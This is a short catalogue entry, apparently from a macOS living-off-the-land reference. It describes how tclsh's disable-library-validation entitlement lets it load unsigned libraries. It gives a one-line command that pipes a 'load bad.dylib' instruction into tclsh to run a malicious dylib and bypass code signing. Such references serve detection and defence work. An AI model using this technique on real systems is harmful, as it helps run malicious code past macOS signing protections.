Created by Brendan Chamberlain (@infosecB)
tclsh is a shell-like utility that runs Tcl from standard input or a file. tclsh holds the “com.apple.security.cs.disable-library-validation” entitlement and is capable of loading arbitary plug-ins, framework, and libraries without requiring signed code.
Execute malicious dynamic library (.dylib) from standard input
An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.
echo "load bad.dylib" | tclsh
- Leo Pitt (@_D00mfist)